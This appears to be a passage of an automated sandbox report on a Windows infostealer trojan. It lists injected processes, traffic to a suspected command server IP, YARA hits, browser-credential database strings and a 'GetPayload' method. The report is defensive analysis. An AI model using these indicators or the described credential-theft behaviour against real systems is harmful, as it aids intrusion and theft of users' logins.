Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_520ab8aa-e
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_d15392e1-b
Source: Yara match File source: 0.3.wdeeFKntav.exe.45c0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.dialer.exe.4fd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.dialer.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.47e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.dialer.exe.4fd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.47e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.45c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.45c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wdeeFKntav.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dialer.exe PID: 3544, type: MEMORYSTR
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B168230C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 3_3_0000025B168230C7
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E215AC NtAcceptConnectPort, 3_2_0000025B14E215AC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E20AC8 NtAcceptConnectPort,NtAcceptConnectPort, 3_2_0000025B14E20AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E21CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 3_2_0000025B14E21CD0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 3_2_0000025B14E21A90
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F059F40 NtAcceptConnectPort, 3_2_00007DF41F059F40
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058D94 NtAcceptConnectPort, 3_2_00007DF41F058D94
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058C90 NtAcceptConnectPort, 3_2_00007DF41F058C90
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F059CA0 _calloc_dbg,NtAcceptConnectPort, 3_2_00007DF41F059CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058C08 NtAcceptConnectPort, 3_2_00007DF41F058C08
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F059AF4 _malloc_dbg,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 3_2_00007DF41F059AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058AFC NtAcceptConnectPort, 3_2_00007DF41F058AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058A40 NtAcceptConnectPort, 3_2_00007DF41F058A40
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05A600 NtAcceptConnectPort, 3_2_00007DF41F05A600
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05A540 NtAcceptConnectPort, 3_2_00007DF41F05A540
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05A2B0 NtAcceptConnectPort, 3_2_00007DF41F05A2B0
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00CC0AA0 0_2_00CC0AA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16825E7C 3_3_0000025B16825E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B1682557C 3_3_0000025B1682557C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B168258FC 3_3_0000025B168258FC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B1682279C 3_3_0000025B1682279C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16821BA6 3_3_0000025B16821BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16824A38 3_3_0000025B16824A38
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16822C3C 3_3_0000025B16822C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B168224F7 3_3_0000025B168224F7
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E20C5C 3_2_0000025B14E20C5C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F045BD8 3_2_00007DF41F045BD8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04BEC4 3_2_00007DF41F04BEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07CEC4 3_2_00007DF41F07CEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0A6F20 3_2_00007DF41F0A6F20
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F11CF3C 3_2_00007DF41F11CF3C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F113DE0 3_2_00007DF41F113DE0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F089E68 3_2_00007DF41F089E68
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F117CF4 3_2_00007DF41F117CF4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F088BE8 3_2_00007DF41F088BE8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F031BFC 3_2_00007DF41F031BFC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F040C44 3_2_00007DF41F040C44
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05EC44 3_2_00007DF41F05EC44
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096B20 3_2_00007DF41F096B20
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F08A9C4 3_2_00007DF41F08A9C4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096A10 3_2_00007DF41F096A10
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F034A14 3_2_00007DF41F034A14
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F084A14 3_2_00007DF41F084A14
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1158AC 3_2_00007DF41F1158AC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1178D8 3_2_00007DF41F1178D8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07F954 3_2_00007DF41F07F954
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0577A0 3_2_00007DF41F0577A0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0717C4 3_2_00007DF41F0717C4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07C7E8 3_2_00007DF41F07C7E8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F10780C 3_2_00007DF41F10780C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04D850 3_2_00007DF41F04D850
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096834 3_2_00007DF41F096834
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F087860 3_2_00007DF41F087860
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04D688 3_2_00007DF41F04D688
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0CB68C 3_2_00007DF41F0CB68C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1246F8 3_2_00007DF41F1246F8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F118750 3_2_00007DF41F118750
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F09F4FC 3_2_00007DF41F09F4FC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F088534 3_2_00007DF41F088534
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1173A0 3_2_00007DF41F1173A0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1183B8 3_2_00007DF41F1183B8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0AA3F4 3_2_00007DF41F0AA3F4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F03E414 3_2_00007DF41F03E414
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07C45C 3_2_00007DF41F07C45C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F067318 3_2_00007DF41F067318
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F043314 3_2_00007DF41F043314
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1241DC 3_2_00007DF41F1241DC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1111BC 3_2_00007DF41F1111BC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07D210 3_2_00007DF41F07D210
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F118238 3_2_00007DF41F118238
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0D40A0 3_2_00007DF41F0D40A0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F09B094 3_2_00007DF41F09B094
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096F78 3_2_00007DF41F096F78
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F086FA0 3_2_00007DF41F086FA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F10C01C 3_2_00007DF41F10C01C
Source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000046E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.0000000004652000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000000.2073258965.0000000000CDB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.0000000004730000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2113264458.00000000049C1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112323721.0000000004936000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2111775317.0000000004738000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112684749.000000000488D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
Source: wdeeFKntav.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@5/0@0/1
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\wdeeFKntav.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 00000003.00000003.2320449048.0000025B16DB7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16DB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE sqlite_sequence(name,seq) AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)framework;
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 00000003.00000003.2319637690.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17020000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319529034.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330694334.0000025B17000000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330260861.0000025B17050000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: wdeeFKntav.exe ReversingLabs: Detection: 76%
